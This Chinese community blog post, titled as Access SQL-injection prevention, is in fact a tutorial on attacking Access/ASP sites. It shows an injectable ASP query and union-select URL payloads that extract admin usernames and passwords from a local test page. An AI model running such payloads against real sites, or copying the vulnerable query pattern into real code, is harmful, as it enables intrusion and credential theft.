office交流網(wǎng)--QQ交流群號(hào)

Access培訓(xùn)群:792054000         Excel免費(fèi)交流群群:686050929          Outlook交流群:221378704    

Word交流群:218156588             PPT交流群:324131555

Access安全防范-SQL 注入

2017-09-06 08:00:00
zstmtony
原創(chuàng)
4157



SQL注入之access

access三大攻擊手法

1.access注入攻擊片段-聯(lián)合查詢法

2.access注入攻擊片段-逐字猜解法

3.工具類的使用注入

Sql注入產(chǎn)生條件

1.必須有參數(shù)傳遞

2.參數(shù)值帶入數(shù)據(jù)庫查詢并執(zhí)行

 

Access注入是暴力猜解

Access數(shù)據(jù)結(jié)構(gòu)(access只有一個(gè)數(shù)據(jù)庫)

Access數(shù)據(jù)庫

表名

列名

數(shù)據(jù)

  

該頁面asp的sql語句

<%
id=request("id")
sql="select * from product where id="&id
set rs=conn.execute(sql)
%>

1.access注入攻擊片段-聯(lián)合查詢法(union)

判斷注入

猜解表名

猜解列名

猜解數(shù)據(jù)

Order by 22 22 代表查詢的列名的數(shù)目有22個(gè)

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 正常

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 錯(cuò)誤

 

猜解表名 確定存在admin表名

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

 

猜解列名 猜解數(shù)據(jù)

http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT

1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

 

表名和列名猜解成功率不是百分百,猜解不到解決辦法?

1.字典文件收集(社工)

2.Access偏移注入

分享
文章分類
聯(lián)系我們
聯(lián)系人: 王先生
Email: 18449932@qq.com
QQ: 18449932
微博: officecn01
移動(dòng)訪問